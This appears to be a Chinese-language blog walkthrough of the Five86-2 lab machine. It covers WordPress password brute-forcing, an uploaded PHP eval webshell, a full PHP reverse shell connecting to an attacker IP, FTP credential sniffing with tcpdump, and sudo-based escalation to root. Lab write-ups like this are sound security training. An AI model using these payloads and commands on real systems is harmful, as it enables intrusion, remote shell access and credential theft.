<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <title>
    Five86-2 |
    
    yichen&#39;s blog</title>
  
    <link rel="shortcut icon" href="/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<script src="/js/pace.min.js"></script>

<meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="yichen's blog" type="application/atom+xml">
</head>

<body>
<main class="content">
  <section class="outer">
<meta name="referrer" content="no-referrer" />
  <article id="post-tbpbf7" class="article article-type-post" itemscope itemprop="blogPost" data-scroll-reveal>

    <div class="article-inner">
        
            <header class="article-header">
                
  
    <h1 class="article-title" itemprop="name">
      Five86-2
    </h1>
  
  




            </header>
            

                
                    <div class="article-meta">
                        <a href="/2020/05/18/tbpbf7/" class="article-date">
  <time datetime="2020-05-18T06:51:50.000Z" itemprop="datePublished">2020-05-18</time>
</a>
                            
                    </div>
                    

                        
                            




                                

                                    <div class="article-entry" itemprop="articleBody">
                                        


                                            

                                                
                                                                    <p>nmap 扫描端口</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1589785065630-02945079-928c-4930-a40b-45266f66dea2.png#align=left&display=inline&height=265&margin=%5Bobject%20Object%5D&name=image.png&originHeight=530&originWidth=1297&size=130534&status=done&style=none&width=648.5" alt="image.png"></p>
<p>访问 80 口（要改一下 hosts 文件）</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1589785126238-20878795-8ff3-497d-a5e5-4a6a038f5cb1.png#align=left&display=inline&height=469&margin=%5Bobject%20Object%5D&name=image.png&originHeight=937&originWidth=1099&size=68276&status=done&style=stroke&width=549.5" alt="image.png"></p>
<p>是一个 wordpress，wpscan 来扫描一下看看有哪些用户<br>wpscan –url <a href="http://five86-2/" target="_blank" rel="noopener">http://five86-2/</a> -e u</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1589787415764-636b6fde-e3d4-43a5-b34d-6bdefffd96d6.png#align=left&display=inline&height=370&margin=%5Bobject%20Object%5D&name=image.png&originHeight=740&originWidth=1098&size=156409&status=done&style=none&width=549" alt="image.png"></p>
<p>wpscan –url <a href="http://five86-2%20-P%20passwords.txt">http://five86-2 -P passwords.txt</a> -U users.txt 来爆破一下用户名和密码</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1589787352473-5fe2d66a-bafc-47da-b4f3-4a4fd757f585.png#align=left&display=inline&height=382&margin=%5Bobject%20Object%5D&name=image.png&originHeight=764&originWidth=1145&size=157309&status=done&style=none&width=572.5" alt="image.png"></p>
<blockquote>
<p>Username: barney, Password: spooky1<br>Username: stephen, Password: apollo1</p>
</blockquote>
<p>选一个登录一下，再 Add New 中新建一个 e-learning</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1589796774637-de1838d7-1f96-4583-a61d-27e787ba4df7.png#align=left&display=inline&height=368&margin=%5Bobject%20Object%5D&name=image.png&originHeight=698&originWidth=872&size=57548&status=done&style=stroke&width=460" alt="image.png"></p>
<p>echo “<html>hello</html>“ &gt; index.html<br>echo “<?php @eval ($_POST ['yichen']); ?>“ &gt; index.php<br>zip poc.zip index.html index.php<br>来生成一个 zip，然后上传，可以看到文件路径，直接访问那个 php 的后门</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1589797800626-9d32a368-f283-4778-a816-bc8d5cb9455f.png#align=left&display=inline&height=327&margin=%5Bobject%20Object%5D&name=image.png&originHeight=654&originWidth=1920&size=96696&status=done&style=stroke&width=960" alt="image.png"></p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1589797876697-6070242a-0f4e-43af-980a-7da18a2a0322.png#align=left&display=inline&height=66&margin=%5Bobject%20Object%5D&name=image.png&originHeight=132&originWidth=960&size=19406&status=done&style=stroke&width=480" alt="image.png"></p>
<p>蚁剑连上，发现执行不了 nc 命令，在蚁剑的终端上也没法切换用户，然后写了个 system 的 php 也没法反弹 shell<br><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1589799020113-9005aa5d-7ecf-4113-96e0-3ebc50d9cc2d.png#align=left&display=inline&height=449&margin=%5Bobject%20Object%5D&name=image.png&originHeight=898&originWidth=1338&size=77056&status=done&style=none&width=669" alt="image.png"><br>找了个别的版本的 shell</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$ip = <span class="string">'192.168.149.141'</span>;</span><br><span class="line">$port = <span class="string">'6666'</span>;</span><br><span class="line">$sock = fsockopen($ip, $port);</span><br><span class="line">$descriptorspec = <span class="keyword">array</span>(</span><br><span class="line">    <span class="number">0</span> =&gt; $sock,</span><br><span class="line">    <span class="number">1</span> =&gt; $sock,</span><br><span class="line">    <span class="number">2</span> =&gt; $sock</span><br><span class="line">);</span><br><span class="line">$process = proc_open(<span class="string">'/bin/sh'</span>,$descriptorspec, $pipes);</span><br><span class="line">proc_close($process);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>没有 python2 所以用的 python3<br>python3 -c “import pty;pty.spawn(‘/bin/bash’)”</p>
<p>切换到 stephen 用户<br>Username: stephen, Password: apollo1</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1590066071881-f1ebda92-34aa-4bbb-b127-946fb85142d4.png#align=left&display=inline&height=218&margin=%5Bobject%20Object%5D&name=image.png&originHeight=347&originWidth=863&size=73790&status=done&style=none&width=543" alt="image.png"></p>
<p>ps -auxw<br>-a 显示同一终端下的所有程序<br>-aux 显示所有包含其他使用者的行程<br>-w 显示加宽可以显示较多的资讯</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1590107929280-4107d4e1-66c2-4eab-bd02-8b9ad0fc7668.png#align=left&display=inline&height=424&margin=%5Bobject%20Object%5D&name=image.png&originHeight=603&originWidth=844&size=66895&status=done&style=none&width=591" alt="image.png"></p>
<p>可以看到 ftp 是 paul 用户的跑的，ftp 大多数是明文传输，所以可以使用 tcpdump 抓包看一下看一下网卡信息<br>stephen 用户是可以运行 tcpdump 的<br>cat /proc/net/dev</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1590066697169-224fa372-fff4-41ce-9e21-2c17ad35bd7c.png#align=left&display=inline&height=97&margin=%5Bobject%20Object%5D&name=image.png&originHeight=194&originWidth=1324&size=44411&status=done&style=none&width=662" alt="image.png"></p>
<p>前面 timeout 设置一下时间，到时间就关掉进程<br>timeout 150 tcpdump -i veth6b4bbb1 -w ftp.pcap<br>-i 指定网卡<br>-w 保存为文件而不是标准输出</p>
<p>直接 cat 文件也可以看到，也可以放到 /tmp 目录，下载下来用 wrieshark 查看<br>得到 ftp 账户：paul:esomepasswford</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1590067582649-14868c94-2c3b-4707-a6a2-231bdd21b60d.png#align=left&display=inline&height=152&margin=%5Bobject%20Object%5D&name=image.png&originHeight=231&originWidth=567&size=20616&status=done&style=stroke&width=374" alt="image.png"></p>
<p>尝试切换一下，成功</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1590067706688-4382b657-b713-4676-bd3c-8ad6047a9c0e.png#align=left&display=inline&height=153&margin=%5Bobject%20Object%5D&name=image.png&originHeight=175&originWidth=361&size=19460&status=done&style=none&width=315" alt="image.png"></p>
<p>sudo -l 发现一个不用密码的，可以直接切换到 pater 账户的 shell</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1590067754371-89913519-e3f5-4e15-9286-340745fbb9ef.png#align=left&display=inline&height=102&margin=%5Bobject%20Object%5D&name=image.png&originHeight=169&originWidth=930&size=34974&status=done&style=none&width=561" alt="image.png"></p>
<p>sudo -u peter service ../../../../../../bin/sh<br>再次 sudo -l 发现可以执行 passwd 来修改密码</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1590067848956-0e6b4c68-eb7c-46e6-99d4-7fe97a4c0e50.png#align=left&display=inline&height=153&margin=%5Bobject%20Object%5D&name=image.png&originHeight=236&originWidth=930&size=44538&status=done&style=none&width=604" alt="image.png"></p>
<p>sudo passwd root 更改 root 的密码，然后切换到 root 用户就可以啦</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/268938/1590068017125-976a77de-8c8d-40ef-b1ad-d2756b5492fe.png#align=left&display=inline&height=363&margin=%5Bobject%20Object%5D&name=image.png&originHeight=726&originWidth=924&size=95772&status=done&style=none&width=462" alt="image.png"></p>

                                                                        
                                    </div>
                                    <footer class="article-footer">
                                        <a data-url="http://yoursite.com/2020/05/18/tbpbf7/" data-id="ckco53qbi000g8ou9413b5tge" class="article-share-link">
                                            Share
                                        </a>
                                        
                                    </footer>

    </div>

    
        
  <nav class="article-nav">
    
      <a href="/2020/05/24/xqeozk/" class="article-nav-link">
        <strong class="article-nav-caption">Newer</strong>
        <div class="article-nav-title">
          
            1、Setup
          
        </div>
      </a>
    
    
      <a href="/2020/05/12/opfhno/" class="article-nav-link">
        <strong class="article-nav-caption">Older</strong>
        <div class="article-nav-title">solidity语法 临时整理发公众号</div>
      </a>
    
  </nav>


            

                
                    
    <div class="vcomments" id="vcomments"></div>
    
<script src="https://unpkg.com/valine/dist/Valine.min.js"></script>

        <script>
            new Valine({
                el: '#vcomments',
                appId: '',
                appKey: '',
                notify: 'false',
                verify: 'true',
                avatar: 'mp',
                pageSize: '10',
                placeholder: '请输入...'
            })
        </script>
        
                        
                            

</article>
</section>
  <footer class="footer">
  <div class="outer">
    <div class="float-right">
      <ul class="list-inline">
  
    <li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
  
    <li><i class="fe fe-bookmark"></i> <span id="busuanzi_value_page_pv"></span></li>
  
</ul>
    </div>
    <ul class="list-inline">
      <li>&copy; 2020 yichen&#39;s blog</li>
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
      <li>Theme  <a href="https://github.com/zhwangart/hexo-theme-ocean" target="_blank" rel="noopener">Ocean</a></li>
    </ul>
  </div>
</footer>

</main>
<aside class="sidebar">
  <button class="navbar-toggle"></button>
<nav class="navbar">
  
    <div class="logo">
      <a href="/"><img src="/images/head.png" alt="yichen&#39;s blog"></a>
    </div>
  
  <ul class="nav nav-main">
    
      <li class="nav-item">
        <a class="nav-item-link" href="/">主页</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/archives">归档</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="https://www.yuque.com/hxfqg9" target="_blank" rel="noopener">语雀</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="https://mp.weixin.qq.com/s/_xKmbanQddRoX2SoAcihWA" target="_blank" rel="noopener">关于</a>
      </li>
    
    <li class="nav-item">
      <a class="nav-item-link nav-item-search" title="Search">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
    </li>
    <li class="nav-item">
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
</aside>

<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script src="/js/busuanzi-2.3.pure.min.js"></script>


  
<script src="/fancybox/jquery.fancybox.min.js"></script>




  
<script src="/js/tocbot.min.js"></script>

  <script>
    // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
    tocbot.init({
      tocSelector: '.tocbot',
      contentSelector: '.article-entry',
      headingSelector: 'h1, h2, h3, h4, h5, h6',
      hasInnerContainers: true,
      scrollSmooth: true,
      positionFixedSelector: '.tocbot',
      positionFixedClass: 'is-position-fixed',
      fixedSidebarOffset: 'auto',
    });
  </script>



<script src="/js/ocean.js"></script>


</body>
</html>